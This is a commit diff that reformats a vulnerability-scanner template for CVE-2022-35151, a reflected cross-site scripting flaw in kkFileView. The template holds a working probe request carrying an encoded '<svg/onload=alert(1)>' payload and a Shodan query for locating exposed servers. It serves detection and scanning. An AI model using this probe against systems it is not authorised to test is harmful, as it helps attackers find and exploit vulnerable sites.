Update CVE-2022-35151.yaml
parent
27665b759a
commit
335b407ab3
|
@ -11,26 +11,26 @@ info:
|
|||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35151
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
|
||||
metadata:
|
||||
verified: "true"
|
||||
verified: true
|
||||
shodan-query: http.html:"kkFileView"
|
||||
tags: cve,cve2022,xss,kkfileview
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B"
|
||||
- '{{BaseURL}}/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<svg/onload=alert(1)>'
|
||||
- "<svg/onload=alert(1)>"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'text/html'
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue